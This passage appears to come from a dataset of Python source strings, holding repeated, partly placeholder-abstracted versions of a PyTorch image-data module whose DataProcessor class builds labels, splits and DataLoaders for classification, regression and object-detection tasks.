(self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n\n\nclass my_image_folder(DatasetFolder):\n <function token>\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs 